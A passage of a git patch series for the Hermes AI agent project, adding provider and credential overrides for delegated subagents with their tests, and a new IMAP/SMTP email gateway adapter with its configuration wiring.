+    @patch("hermes_cli.runtime_provider.resolve_runtime_provider")
+    def test_provider_resolution_failure_raises_valueerror(self, mock_resolve):
+        """When provider resolution fails, ValueError is raised with helpful message."""
+        mock_resolve.side_effect = RuntimeError("OPENROUTER_API_KEY not set")
+        parent = _make_mock_parent(depth=0)
+        cfg = {"model": "some-model", "provider": "openrouter"}
+        with self.assertRaises(ValueError) as ctx:
+            _resolve_delegation_credentials(cfg, parent)
+        self.assertIn("openrouter", str(ctx.exception).lower())
+        self.assertIn("Cannot resolve", str(ctx.exception))
+
+    @patch("hermes_cli.runtime_provider.resolve_runtime_provider")
+    def test_provider_resolves_but_no_api_key_raises(self, mock_resolve):
+        """When provider resolves but has no API key, ValueError is raised."""
+        mock_resolve.return_value = {
+            "provider": "openrouter",
+            "base_url": "https://openrouter.ai/api/v1",
+            "api_key": "",
+            "api_mode": "chat_completions",
+        }
+        parent = _make_mock_parent(depth=0)
+        cfg = {"model": "some-model", "provider": "openrouter"}
+        with self.assertRaises(ValueError) as ctx:
+            _resolve_delegation_credentials(cfg, parent)
+        self.assertIn("no API key", str(ctx.exception))
+
+    def test_missing_config_keys_inherit_parent(self):
+        """When config dict has no model/provider keys at all, inherits parent."""
+        parent = _make_mock_parent(depth=0)
+        cfg = {"max_iterations": 45}
+        creds = _resolve_delegation_credentials(cfg, parent)
+        self.assertIsNone(creds["model"])
+        self.assertIsNone(creds["provider"])
+
+
+class TestDelegationProviderIntegration(unittest.TestCase):
+    """Integration tests: delegation config → _run_single_child → AIAgent construction."""
+
+    @patch("tools.delegate_tool._load_config")
+    @patch("tools.delegate_tool._resolve_delegation_credentials")
+    def test_config_provider_credentials_reach_child_agent(self, mock_creds, mock_cfg):
+        """When delegation.provider is configured, child agent gets resolved credentials."""
+        mock_cfg.return_value = {
+            "max_iterations": 45,
+            "model": "google/gemini-3-flash-preview",
+            "provider": "openrouter",
+        }
+        mock_creds.return_value = {
+            "model": "google/gemini-3-flash-preview",
+            "provider": "openrouter",
+            "base_url": "https://openrouter.ai/api/v1",
+            "api_key": "sk-or-delegation-key",
+            "api_mode": "chat_completions",
+        }
+        parent = _make_mock_parent(depth=0)
+
+        with patch("run_agent.AIAgent") as MockAgent:
+            mock_child = MagicMock()
+            mock_child.run_conversation.return_value = {
+                "final_response": "done", "completed": True, "api_calls": 1
+            }
+            MockAgent.return_value = mock_child
+
+            delegate_task(goal="Test provider routing", parent_agent=parent)
+
+            _, kwargs = MockAgent.call_args
+            self.assertEqual(kwargs["model"], "google/gemini-3-flash-preview")
+            self.assertEqual(kwargs["provider"], "openrouter")
+            self.assertEqual(kwargs["base_url"], "https://openrouter.ai/api/v1")
+            self.assertEqual(kwargs["api_key"], "sk-or-delegation-key")
+            self.assertEqual(kwargs["api_mode"], "chat_completions")
+
+    @patch("tools.delegate_tool._load_config")
+    @patch("tools.delegate_tool._resolve_delegation_credentials")
+    def test_cross_provider_delegation(self, mock_creds, mock_cfg):
+        """Parent on Nous, subagent on OpenRouter — full credential switch."""
+        mock_cfg.return_value = {
+            "max_iterations": 45,
+            "model": "google/gemini-3-flash-preview",
+            "provider": "openrouter",
+        }
+        mock_creds.return_value = {
+            "model": "google/gemini-3-flash-preview",
+            "provider": "openrouter",
+            "base_url": "https://openrouter.ai/api/v1",
+            "api_key": "sk-or-key",
+            "api_mode": "chat_completions",
+        }
+        parent = _make_mock_parent(depth=0)
+        parent.provider = "nous"
+        parent.base_url = "https://inference-api.nousresearch.com/v1"
+        parent.api_key = "nous-key-abc"
+
+        with patch("run_agent.AIAgent") as MockAgent:
+            mock_child = MagicMock()
+            mock_child.run_conversation.return_value = {
+                "final_response": "done", "completed": True, "api_calls": 1
+            }
+            MockAgent.return_value = mock_child
+
+            delegate_task(goal="Cross-provider test", parent_agent=parent)
+
+            _, kwargs = MockAgent.call_args
+            # Child should use OpenRouter, NOT Nous
+            self.assertEqual(kwargs["provider"], "openrouter")
+            self.assertEqual(kwargs["base_url"], "https://openrouter.ai/api/v1")
+            self.assertEqual(kwargs["api_key"], "sk-or-key")
+            self.assertNotEqual(kwargs["base_url"], parent.base_url)
+            self.assertNotEqual(kwargs["api_key"], parent.api_key)
+
+    @patch("tools.delegate_tool._load_config")
+    @patch("tools.delegate_tool._resolve_delegation_credentials")
+    def test_empty_config_inherits_parent(self, mock_creds, mock_cfg):
+        """When delegation config is empty, child inherits parent credentials."""
+        mock_cfg.return_value = {"max_iterations": 45, "model": "", "provider": ""}
+        mock_creds.return_value = {
+            "model": None,
+            "provider": None,
+            "base_url": None,
+            "api_key": None,
+            "api_mode": None,
+        }
+        parent = _make_mock_parent(depth=0)
+
+        with patch("run_agent.AIAgent") as MockAgent:
+            mock_child = MagicMock()
+            mock_child.run_conversation.return_value = {
+                "final_response": "done", "completed": True, "api_calls": 1
+            }
+            MockAgent.return_value = mock_child
+
+            delegate_task(goal="Test inherit", parent_agent=parent)
+
+            _, kwargs = MockAgent.call_args
+            self.assertEqual(kwargs["model"], parent.model)
+            self.assertEqual(kwargs["provider"], parent.provider)
+            self.assertEqual(kwargs["base_url"], parent.base_url)
+
+    @patch("tools.delegate_tool._load_config")
+    @patch("tools.delegate_tool._resolve_delegation_credentials")
+    def test_credential_error_returns_json_error(self, mock_creds, mock_cfg):
+        """When credential resolution fails, delegate_task returns a JSON error."""
+        mock_cfg.return_value = {"model": "bad-model", "provider": "nonexistent"}
+        mock_creds.side_effect = ValueError(
+            "Cannot resolve delegation provider 'nonexistent': Unknown provider"
+        )
+        parent = _make_mock_parent(depth=0)
+
+        result = json.loads(delegate_task(goal="Should fail", parent_agent=parent))
+        self.assertIn("error", result)
+        self.assertIn("Cannot resolve", result["error"])
+        self.assertIn("nonexistent", result["error"])
+
+    @patch("tools.delegate_tool._load_config")
+    @patch("tools.delegate_tool._resolve_delegation_credentials")
+    def test_batch_mode_all_children_get_credentials(self, mock_creds, mock_cfg):
+        """In batch mode, all children receive the resolved credentials."""
+        mock_cfg.return_value = {
+            "max_iterations": 45,
+            "model": "meta-llama/llama-4-scout",
+            "provider": "openrouter",
+        }
+        mock_creds.return_value = {
+            "model": "meta-llama/llama-4-scout",
+            "provider": "openrouter",
+            "base_url": "https://openrouter.ai/api/v1",
+            "api_key": "sk-or-batch",
+            "api_mode": "chat_completions",
+        }
+        parent = _make_mock_parent(depth=0)
+
+        with patch("tools.delegate_tool._run_single_child") as mock_run:
+            mock_run.return_value = {
+                "task_index": 0, "status": "completed",
+                "summary": "Done", "api_calls": 1, "duration_seconds": 1.0
+            }
+
+            tasks = [{"goal": "Task A"}, {"goal": "Task B"}]
+            delegate_task(tasks=tasks, parent_agent=parent)
+
+            for call in mock_run.call_args_list:
+                self.assertEqual(call.kwargs.get("model"), "meta-llama/llama-4-scout")
+                self.assertEqual(call.kwargs.get("override_provider"), "openrouter")
+                self.assertEqual(call.kwargs.get("override_base_url"), "https://openrouter.ai/api/v1")
+                self.assertEqual(call.kwargs.get("override_api_key"), "sk-or-batch")
+                self.assertEqual(call.kwargs.get("override_api_mode"), "chat_completions")
+
+    @patch("tools.delegate_tool._load_config")
+    @patch("tools.delegate_tool._resolve_delegation_credentials")
+    def test_model_only_no_provider_inherits_parent_credentials(self, mock_creds, mock_cfg):
+        """Setting only model (no provider) changes model but keeps parent credentials."""
+        mock_cfg.return_value = {
+            "max_iterations": 45,
+            "model": "google/gemini-3-flash-preview",
+            "provider": "",
+        }
+        mock_creds.return_value = {
+            "model": "google/gemini-3-flash-preview",
+            "provider": None,
+            "base_url": None,
+            "api_key": None,
+            "api_mode": None,
+        }
+        parent = _make_mock_parent(depth=0)
+
+        with patch("run_agent.AIAgent") as MockAgent:
+            mock_child = MagicMock()
+            mock_child.run_conversation.return_value = {
+                "final_response": "done", "completed": True, "api_calls": 1
+            }
+            MockAgent.return_value = mock_child
+
+            delegate_task(goal="Model only test", parent_agent=parent)
+
+            _, kwargs = MockAgent.call_args
+            # Model should be overridden
+            self.assertEqual(kwargs["model"], "google/gemini-3-flash-preview")
+            # But provider/base_url/api_key should inherit from parent
+            self.assertEqual(kwargs["provider"], parent.provider)
+            self.assertEqual(kwargs["base_url"], parent.base_url)
+
+
 if __name__ == "__main__":
     unittest.main()
diff --git a/tools/delegate_tool.py b/tools/delegate_tool.py
index 835b46af..8ade49fe 100644
--- a/tools/delegate_tool.py
+++ b/tools/delegate_tool.py
@@ -166,10 +166,20 @@ def _run_single_child(
     max_iterations: int,
     parent_agent,
     task_count: int = 1,
+    # Credential overrides from delegation config (provider:model resolution)
+    override_provider: Optional[str] = None,
+    override_base_url: Optional[str] = None,
+    override_api_key: Optional[str] = None,
+    override_api_mode: Optional[str] = None,
 ) -> Dict[str, Any]:
     """
     Spawn and run a single child agent. Called from within a thread.
     Returns a structured result dict.
+
+    When override_* params are set (from delegation config), the child uses
+    those credentials instead of inheriting from the parent.  This enables
+    routing subagents to a different provider:model pair (e.g. cheap/fast
+    model on OpenRouter while the parent runs on Nous Portal).
     """
     from run_agent import AIAgent
 
@@ -199,12 +209,19 @@ def _run_single_child(
         # count toward the session-wide limit.
         shared_budget = getattr(parent_agent, "iteration_budget", None)
 
+        # Resolve effective credentials: config override > parent inherit
+        effective_model = model or parent_agent.model
+        effective_provider = override_provider or getattr(parent_agent, "provider", None)
+        effective_base_url = override_base_url or parent_agent.base_url
+        effective_api_key = override_api_key or parent_api_key
+        effective_api_mode = override_api_mode or getattr(parent_agent, "api_mode", None)
+
         child = AIAgent(
-            base_url=parent_agent.base_url,
-            api_key=parent_api_key,
-            model=model or parent_agent.model,
-            provider=getattr(parent_agent, "provider", None),
-            api_mode=getattr(parent_agent, "api_mode", None),
+            base_url=effective_base_url,
+            api_key=effective_api_key,
+            model=effective_model,
+            provider=effective_provider,
+            api_mode=effective_api_mode,
             max_iterations=max_iterations,
             max_tokens=getattr(parent_agent, "max_tokens", None),
             reasoning_config=getattr(parent_agent, "reasoning_config", None),
@@ -327,6 +344,16 @@ def delegate_task(
     default_max_iter = cfg.get("max_iterations", DEFAULT_MAX_ITERATIONS)
     effective_max_iter = max_iterations or default_max_iter
 
+    # Resolve delegation credentials (provider:model pair).
+    # When delegation.provider is configured, this resolves the full credential
+    # bundle (base_url, api_key, api_mode) via the same runtime provider system
+    # used by CLI/gateway startup.  When unconfigured, returns None values so
+    # children inherit from the parent.
+    try:
+        creds = _resolve_delegation_credentials(cfg, parent_agent)
+    except ValueError as exc:
+        return json.dumps({"error": str(exc)})
+
     # Normalize to task list
     if tasks and isinstance(tasks, list):
         task_list = tasks[:MAX_CONCURRENT_CHILDREN]
@@ -358,10 +385,14 @@ def delegate_task(
             goal=t["goal"],
             context=t.get("context"),
             toolsets=t.get("toolsets") or toolsets,
-            model=None,
+            model=creds["model"],
             max_iterations=effective_max_iter,
             parent_agent=parent_agent,
             task_count=1,
+            override_provider=creds["provider"],
+            override_base_url=creds["base_url"],
+            override_api_key=creds["api_key"],
+            override_api_mode=creds["api_mode"],
         )
         results.append(result)
     else:
@@ -383,10 +414,14 @@ def delegate_task(
                     goal=t["goal"],
                     context=t.get("context"),
                     toolsets=t.get("toolsets") or toolsets,
-                    model=None,
+                    model=creds["model"],
                     max_iterations=effective_max_iter,
                     parent_agent=parent_agent,
                     task_count=n_tasks,
+                    override_provider=creds["provider"],
+                    override_base_url=creds["base_url"],
+                    override_api_key=creds["api_key"],
+                    override_api_mode=creds["api_mode"],
                 )
                 futures[future] = i
 
@@ -444,11 +479,78 @@ def delegate_task(
     }, ensure_ascii=False)
 
 
+def _resolve_delegation_credentials(cfg: dict, parent_agent) -> dict:
+    """Resolve credentials for subagent delegation.
+
+    If ``delegation.provider`` is configured, resolves the full credential
+    bundle (base_url, api_key, api_mode, provider) via the runtime provider
+    system — the same path used by CLI/gateway startup.  This lets subagents
+    run on a completely different provider:model pair.
+
+    If no provider is configured, returns None values so the child inherits
+    everything from the parent agent.
+
+    Raises ValueError with a user-friendly message on credential failure.
+    """
+    configured_model = cfg.get("model") or None
+    configured_provider = cfg.get("provider") or None
+
+    if not configured_provider:
+        # No provider override — child inherits everything from parent
+        return {
+            "model": configured_model,
+            "provider": None,
+            "base_url": None,
+            "api_key": None,
+            "api_mode": None,
+        }
+
+    # Provider is configured — resolve full credentials
+    try:
+        from hermes_cli.runtime_provider import resolve_runtime_provider
+        runtime = resolve_runtime_provider(requested=configured_provider)
+    except Exception as exc:
+        raise ValueError(
+            f"Cannot resolve delegation provider '{configured_provider}': {exc}. "
+            f"Check that the provider is configured (API key set, valid provider name). "
+            f"Available providers: openrouter, nous, zai, kimi-coding, minimax."
+        ) from exc
+
+    api_key = runtime.get("api_key", "")
+    if not api_key:
+        raise ValueError(
+            f"Delegation provider '{configured_provider}' resolved but has no API key. "
+            f"Set the appropriate environment variable or run 'hermes login'."
+        )
+
+    return {
+        "model": configured_model,
+        "provider": runtime.get("provider"),
+        "base_url": runtime.get("base_url"),
+        "api_key": api_key,
+        "api_mode": runtime.get("api_mode"),
+    }
+
+
 def _load_config() -> dict:
-    """Load delegation config from CLI_CONFIG if available."""
+    """Load delegation config from CLI_CONFIG or persistent config.
+
+    Checks the runtime config (cli.py CLI_CONFIG) first, then falls back
+    to the persistent config (hermes_cli/config.py load_config()) so that
+    ``delegation.model`` / ``delegation.provider`` are picked up regardless
+    of the entry point (CLI, gateway, cron).
+    """
     try:
         from cli import CLI_CONFIG
-        return CLI_CONFIG.get("delegation", {})
+        cfg = CLI_CONFIG.get("delegation", {})
+        if cfg:
+            return cfg
+    except Exception:
+        pass
+    try:
+        from hermes_cli.config import load_config
+        full = load_config()
+        return full.get("delegation", {})
     except Exception:
         return {}
 
diff --git a/website/docs/user-guide/configuration.md b/website/docs/user-guide/configuration.md
index f9e72ea7..83921c2f 100644
--- a/website/docs/user-guide/configuration.md
+++ b/website/docs/user-guide/configuration.md
@@ -729,8 +729,16 @@ delegation:
     - terminal
     - file
     - web
+  # model: "google/gemini-3-flash-preview"  # Override model (empty = inherit parent)
+  # provider: "openrouter"                  # Override provider (empty = inherit parent)
 ```
 
+**Subagent provider:model override:** By default, subagents inherit the parent agent's provider and model. Set `delegation.provider` and `delegation.model` to route subagents to a different provider:model pair — e.g., use a cheap/fast model for narrowly-scoped subtasks while your primary agent runs an expensive reasoning model.
+
+The delegation provider uses the same credential resolution as CLI/gateway startup. All configured providers are supported: `openrouter`, `nous`, `zai`, `kimi-coding`, `minimax`, `minimax-cn`. When a provider is set, the system automatically resolves the correct base URL, API key, and API mode — no manual credential wiring needed.
+
+**Precedence:** `delegation.provider` in config → parent provider (inherited). `delegation.model` in config → parent model (inherited). Setting just `model` without `provider` changes only the model name while keeping the parent's credentials (useful for switching models within the same provider like OpenRouter).
+
 ## Clarify
 
 Configure the clarification prompt behavior:

From bdcf247efedf51e4c3cea82b5ff2ed5136989607 Mon Sep 17 00:00:00 2001
From: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
Date: Tue, 10 Mar 2026 03:15:38 +0300
Subject: [PATCH 072/105] feat: add email gateway platform (IMAP/SMTP)

Allow users to interact with Hermes by sending and receiving emails.
Uses IMAP polling for incoming messages and SMTP for replies with
proper threading (In-Reply-To, References headers).

Integrates with all 14 gateway extension points: config, adapter
factory, authorization, send_message tool, cron delivery, toolsets,
prompt hints, channel directory, setup wizard, status display, and
env example.

65 tests covering config, parsing, dispatch, threading, IMAP fetch,
SMTP send, attachments, and all integration points.
---
 .env.example                 |   12 +
 agent/prompt_builder.py      |    8 +
 cron/scheduler.py            |    1 +
 gateway/channel_directory.py |    2 +-
 gateway/config.py            |   26 +
 gateway/platforms/email.py   |  533 ++++++++++++++++++
 gateway/run.py               |    9 +
 hermes_cli/gateway.py        |   35 ++
 hermes_cli/status.py         |    1 +
 tests/gateway/test_email.py  | 1034 ++++++++++++++++++++++++++++++++++
 tools/send_message_tool.py   |   32 ++
 toolsets.py                  |    8 +-
 12 files changed, 1699 insertions(+), 2 deletions(-)
 create mode 100644 gateway/platforms/email.py
 create mode 100644 tests/gateway/test_email.py

diff --git a/.env.example b/.env.example
index 3cbc375b..a5153d1d 100644
--- a/.env.example
+++ b/.env.example
@@ -201,6 +201,18 @@ VOICE_TOOLS_OPENAI_KEY=
 # WHATSAPP_ENABLED=false
 # WHATSAPP_ALLOWED_USERS=15551234567
 
+# Email (IMAP/SMTP — send and receive emails as Hermes)
+# For Gmail: enable 2FA → create App Password at https://myaccount.google.com/apppasswords
+# EMAIL_ADDRESS=hermes@gmail.com
+# EMAIL_PASSWORD=xxxx xxxx xxxx xxxx
+# EMAIL_IMAP_HOST=imap.gmail.com
+# EMAIL_IMAP_PORT=993
+# EMAIL_SMTP_HOST=smtp.gmail.com
+# EMAIL_SMTP_PORT=587
+# EMAIL_POLL_INTERVAL=15
+# EMAIL_ALLOWED_USERS=your@email.com
+# EMAIL_HOME_ADDRESS=your@email.com
+
 # Gateway-wide: allow ALL users without an allowlist (default: false = deny)
 # Only set to true if you intentionally want open access.
 # GATEWAY_ALLOW_ALL_USERS=false
diff --git a/agent/prompt_builder.py b/agent/prompt_builder.py
index d1370a52..ff964fdc 100644
--- a/agent/prompt_builder.py
+++ b/agent/prompt_builder.py
@@ -131,6 +131,14 @@ PLATFORM_HINTS = {
         "files arrive as downloadable documents. You can also include image "
         "URLs in markdown format ![alt](url) and they will be sent as photos."
     ),
+    "email": (
+        "You are communicating via email. Write clear, well-structured responses "
+        "suitable for email. Use plain text formatting (no markdown). "
+        "Keep responses concise but complete. You can send file attachments — "
+        "include MEDIA:/absolute/path/to/file in your response. The subject line "
+        "is preserved for threading. Do not include greetings or sign-offs unless "
+        "contextually appropriate."
+    ),
     "cli": (
         "You are a CLI AI Agent. Try not to use markdown but simple text "
         "renderable inside a terminal."
diff --git a/cron/scheduler.py b/cron/scheduler.py
index d5967d6a..348a25c2 100644
--- a/cron/scheduler.py
+++ b/cron/scheduler.py
@@ -103,6 +103,7 @@ def _deliver_result(job: dict, content: str) -> None:
         "slack": Platform.SLACK,
         "whatsapp": Platform.WHATSAPP,
         "signal": Platform.SIGNAL,
+        "email": Platform.EMAIL,
     }
     platform = platform_map.get(platform_name.lower())
     if not platform:
diff --git a/gateway/channel_directory.py b/gateway/channel_directory.py
index 858859fd..4d11c3a9 100644
--- a/gateway/channel_directory.py
+++ b/gateway/channel_directory.py
@@ -61,7 +61,7 @@ def build_channel_directory(adapters: Dict[Any, Any]) -> Dict[str, Any]:
             logger.warning("Channel directory: failed to build %s: %s", platform.value, e)
 
     # Telegram, WhatsApp & Signal can't enumerate chats -- pull from session history
-    for plat_name in ("telegram", "whatsapp", "signal"):
+    for plat_name in ("telegram", "whatsapp", "signal", "email"):
         if plat_name not in platforms:
             platforms[plat_name] = _build_from_sessions(plat_name)
 
diff --git a/gateway/config.py b/gateway/config.py
index 127e6215..ba0840bf 100644
--- a/gateway/config.py
+++ b/gateway/config.py
@@ -28,6 +28,7 @@ class Platform(Enum):
     SLACK = "slack"
     SIGNAL = "signal"
     HOMEASSISTANT = "homeassistant"
+    EMAIL = "email"
 
 
 @dataclass
@@ -167,6 +168,9 @@ class GatewayConfig:
             # Signal uses extra dict for config (http_url + account)
             elif platform == Platform.SIGNAL and config.extra.get("http_url"):
                 connected.append(platform)
+            # Email uses extra dict for config (address + imap_host + smtp_host)
+            elif platform == Platform.EMAIL and config.extra.get("address"):
+                connected.append(platform)
         return connected
     
     def get_home_channel(self, platform: Platform) -> Optional[HomeChannel]:
@@ -420,6 +424,28 @@ def _apply_env_overrides(config: GatewayConfig) -> None:
         if hass_url:
             config.platforms[Platform.HOMEASSISTANT].extra["url"] = hass_url
 
+    # Email
+    email_addr = os.getenv("EMAIL_ADDRESS")
+    email_pwd = os.getenv("EMAIL_PASSWORD")
+    email_imap = os.getenv("EMAIL_IMAP_HOST")
+    email_smtp = os.getenv("EMAIL_SMTP_HOST")
+    if all([email_addr, email_pwd, email_imap, email_smtp]):
+        if Platform.EMAIL not in config.platforms:
+            config.platforms[Platform.EMAIL] = PlatformConfig()
+        config.platforms[Platform.EMAIL].enabled = True
+        config.platforms[Platform.EMAIL].extra.update({
+            "address": email_addr,
+            "imap_host": email_imap,
+            "smtp_host": email_smtp,
+        })
+        email_home = os.getenv("EMAIL_HOME_ADDRESS")
+        if email_home:
+            config.platforms[Platform.EMAIL].home_channel = HomeChannel(
+                platform=Platform.EMAIL,
+                chat_id=email_home,
+                name=os.getenv("EMAIL_HOME_ADDRESS_NAME", "Home"),
+            )
+
     # Session settings
     idle_minutes = os.getenv("SESSION_IDLE_MINUTES")
     if idle_minutes:
diff --git a/gateway/platforms/email.py b/gateway/platforms/email.py
new file mode 100644
index 00000000..3b2db3f6
--- /dev/null
+++ b/gateway/platforms/email.py
@@ -0,0 +1,533 @@
+"""
+Email platform adapter for the Hermes gateway.
+
+Allows users to interact with Hermes by sending emails.
+Uses IMAP to receive and SMTP to send messages.
+
+Environment variables:
+    EMAIL_IMAP_HOST     — IMAP server host (e.g., imap.gmail.com)
+    EMAIL_IMAP_PORT     — IMAP server port (default: 993)
+    EMAIL_SMTP_HOST     — SMTP server host (e.g., smtp.gmail.com)
+    EMAIL_SMTP_PORT     — SMTP server port (default: 587)
+    EMAIL_ADDRESS       — Email address for the agent
+    EMAIL_PASSWORD      — Email password or app-specific password
+    EMAIL_POLL_INTERVAL — Seconds between mailbox checks (default: 15)
+    EMAIL_ALLOWED_USERS — Comma-separated list of allowed sender addresses
+"""
+
+import asyncio
+import email as email_lib
+import imaplib
+import logging
+import os
+import re
+import smtplib
+import uuid
+from datetime import datetime
+from email.header import decode_header
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
+from email.mime.base import MIMEBase
+from email import encoders
+from pathlib import Path
+from typing import Any, Dict, List, Optional
+
+from gateway.platforms.base import (
+    BasePlatformAdapter,
+    MessageEvent,
+    MessageType,
+    SendResult,
+    cache_document_from_bytes,
+    cache_image_from_bytes,
+)
+from gateway.config import Platform, PlatformConfig
+
+logger = logging.getLogger(__name__)
+
+# Gmail-safe max length per email body
+MAX_MESSAGE_LENGTH = 50_000
+
+# Supported image extensions for inline detection
+_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
+
+
+def check_email_requirements() -> bool:
+    """Check if email platform dependencies are available."""
+    addr = os.getenv("EMAIL_ADDRESS")
+    pwd = os.getenv("EMAIL_PASSWORD")
+    imap = os.getenv("EMAIL_IMAP_HOST")
+    smtp = os.getenv("EMAIL_SMTP_HOST")
+    if not all([addr, pwd, imap, smtp]):
+        return False
+    return True
+
+
+def _decode_header_value(raw: str) -> str:
+    """Decode an RFC 2047 encoded email header into a plain string."""
+    parts = decode_header(raw)
+    decoded = []
+    for part, charset in parts:
+        if isinstance(part, bytes):
+            decoded.append(part.decode(charset or "utf-8", errors="replace"))
+        else:
+            decoded.append(part)
+    return " ".join(decoded)
+
+
+def _extract_text_body(msg: email_lib.message.Message) -> str:
+    """Extract the plain-text body from a potentially multipart email."""
+    if msg.is_multipart():
+        for part in msg.walk():
+            content_type = part.get_content_type()
+            disposition = str(part.get("Content-Disposition", ""))
+            # Skip attachments
+            if "attachment" in disposition:
+                continue
+            if content_type == "text/plain":
+                payload = part.get_payload(decode=True)
+                if payload:
+                    charset = part.get_content_charset() or "utf-8"
+                    return payload.decode(charset, errors="replace")
+        # Fallback: try text/html and strip tags
+        for part in msg.walk():
+            content_type = part.get_content_type()
+            disposition = str(part.get("Content-Disposition", ""))
+            if "attachment" in disposition:
+                continue
+            if content_type == "text/html":
+                payload = part.get_payload(decode=True)
+                if payload:
+                    charset = part.get_content_charset() or "utf-8"
+                    html = payload.decode(charset, errors="replace")
+                    return _strip_html(html)
+        return ""
+    else:
+        payload = msg.get_payload(decode=True)
+        if payload:
+            charset = msg.get_content_charset() or "utf-8"
+            text = payload.decode(charset, errors="replace")
+            if msg.get_content_type() == "text/html":
+                return _strip_html(text)
+            return text
+        return ""
+
+
+def _strip_html(html: str) -> str:
+    """Naive HTML tag stripper for fallback text extraction."""
+    text = re.sub(r"<br\s*/?>", "\n", html, flags=re.IGNORECASE)
+    text = re.sub(r"<p[^>]*>", "\n", text, flags=re.IGNORECASE)
+    text = re.sub(r"</p>", "\n", text, flags=re.IGNORECASE)
+    text = re.sub(r"<[^>]+>", "", text)
+    text = re.sub(r"&nbsp;", " ", text)
+    text = re.sub(r"&amp;", "&", text)
+    text = re.sub(r"&lt;", "<", text)
+    text = re.sub(r"&gt;", ">", text)
+    text = re.sub(r"\n{3,}", "\n\n", text)
+    return text.strip()
+
+
+def _extract_email_address(raw: str) -> str:
+    """Extract bare email address from 'Name <addr>' format."""
+    match = re.search(r"<([^>]+)>", raw)
+    if match:
+        return match.group(1).strip().lower()
+    return raw.strip().lower()
+
+
+def _extract_attachments(msg: email_lib.message.Message) -> List[Dict[str, Any]]:
+    """Extract attachment metadata and cache files locally."""
+    attachments = []
+    if not msg.is_multipart():
+        return attachments
+
+    for part in msg.walk():
+        disposition = str(part.get("Content-Disposition", ""))
+        if "attachment" not in disposition and "inline" not in disposition:
+            continue
+        # Skip text/plain and text/html body parts
+        content_type = part.get_content_type()
+        if content_type in ("text/plain", "text/html") and "attachment" not in disposition:
+            continue
+
+        filename = part.get_filename()
+        if filename:
+            filename = _decode_header_value(filename)
+        else:
+            ext = part.get_content_subtype() or "bin"
+            filename = f"attachment.{ext}"
+
+        payload = part.get_payload(decode=True)
+        if not payload:
+            continue
+
+        ext = Path(filename).suffix.lower()
+        if ext in _IMAGE_EXTS:
+            cached_path = cache_image_from_bytes(payload, ext)
+            attachments.append({
+                "path": cached_path,
+                "filename": filename,
+                "type": "image",
+                "media_type": content_type,
+            })
+        else:
+            cached_path = cache_document_from_bytes(payload, filename)
+            attachments.append({
+                "path": cached_path,
+                "filename": filename,
+                "type": "document",
+                "media_type": content_type,
+            })
+
+    return attachments
+
+
+class EmailAdapter(BasePlatformAdapter):
+    """Email gateway adapter using IMAP (receive) and SMTP (send)."""
+
+    def __init__(self, config: PlatformConfig):
+        super().__init__(config, Platform.EMAIL)
+
+        self._address = os.getenv("EMAIL_ADDRESS", "")
+        self._password = os.getenv("EMAIL_PASSWORD", "")
+        self._imap_host = os.getenv("EMAIL_IMAP_HOST", "")
+        self._imap_port = int(os.getenv("EMAIL_IMAP_PORT", "993"))
+        self._smtp_host = os.getenv("EMAIL_SMTP_HOST", "")
+        self._smtp_port = int(os.getenv("EMAIL_SMTP_PORT", "587"))
+        self._poll_interval = int(os.getenv("EMAIL_POLL_INTERVAL", "15"))
+
+        # Track message IDs we've already processed to avoid duplicates
+        self._seen_uids: set = set()
+        self._poll_task: Optional[asyncio.Task] = None
+
+        # Map chat_id (sender email) -> last subject + message-id for threading
+        self._thread_context: Dict[str, Dict[str, str]] = {}
+
+        logger.info("[Email] Adapter initialized for %s", self._address)
+
+    async def connect(self) -> bool:
+        """Connect to the IMAP server and start polling for new messages."""
+        try:
+            # Test IMAP connection
+            imap = imaplib.IMAP4_SSL(self._imap_host, self._imap_port)
+            imap.login(self._address, self._password)
+            # Mark all existing messages as seen so we only process new ones
+            imap.select("INBOX")
+            status, data = imap.search(None, "ALL")
+            if status == "OK" and data[0]:
+                for uid in data[0].split():
+                    self._seen_uids.add(uid)
+            imap.logout()
+            logger.info("[Email] IMAP connection test passed. %d existing messages skipped.", len(self._seen_uids))
+        except Exception as e:
+            logger.error("[Email] IMAP connection failed: %s", e)
+            return False
+
+        try:
+            # Test SMTP connection
+            smtp = smtplib.SMTP(self._smtp_host, self._smtp_port)
+            smtp.starttls()
+            smtp.login(self._address, self._password)
+            smtp.quit()
+            logger.info("[Email] SMTP connection test passed.")
+        except Exception as e:
+            logger.error("[Email] SMTP connection failed: %s", e)
+            return False
+
+        self._running = True
+        self._poll_task = asyncio.create_task(self._poll_loop())
+        print(f"[Email] Connected as {self._address}")
+        return True
+
+    async def disconnect(self) -> None:
+        """Stop polling and disconnect."""
+        self._running = False
+        if self._poll_task:
+            self._poll_task.cancel()
+            try:
+                await self._poll_task
+            except asyncio.CancelledError:
+                pass
+            self._poll_task = None
+        logger.info("[Email] Disconnected.")
+
+    async def _poll_loop(self) -> None:
+        """Poll IMAP for new messages at regular intervals."""
+        while self._running:
+            try:
+                await self._check_inbox()
+            except asyncio.CancelledError:
+                break
+            except Exception as e:
+                logger.error("[Email] Poll error: %s", e)
+            await asyncio.sleep(self._poll_interval)
+
+    async def _check_inbox(self) -> None:
+        """Check INBOX for unseen messages and dispatch them."""
+        # Run IMAP operations in a thread to avoid blocking the event loop
+        loop = asyncio.get_running_loop()
+        messages = await loop.run_in_executor(None, self._fetch_new_messages)
+        for msg_data in messages:
+            await self._dispatch_message(msg_data)
+
+    def _fetch_new_messages(self) -> List[Dict[str, Any]]:
+        """Fetch new (unseen) messages from IMAP. Runs in executor thread."""
+        results = []
+        try:
+            imap = imaplib.IMAP4_SSL(self._imap_host, self._imap_port)
+            imap.login(self._address, self._password)
+            imap.select("INBOX")
+
+            status, data = imap.search(None, "UNSEEN")
+            if status != "OK" or not data[0]:
+                imap.logout()
+                return results
+
+            for uid in data[0].split():
+                if uid in self._seen_uids:
+                    continue
+                self._seen_uids.add(uid)
+
+                status, msg_data = imap.fetch(uid, "(RFC822)")
+                if status != "OK":
+                    continue
+
+                raw_email = msg_data[0][1]
+                msg = email_lib.message_from_bytes(raw_email)
+
+                sender_raw = msg.get("From", "")
+                sender_addr = _extract_email_address(sender_raw)
+                sender_name = _decode_header_value(sender_raw)
+                # Remove email from name if present
+                if "<" in sender_name:
+                    sender_name = sender_name.split("<")[0].strip().strip('"')
+
+                subject = _decode_header_value(msg.get("Subject", "(no subject)"))
+                message_id = msg.get("Message-ID", "")
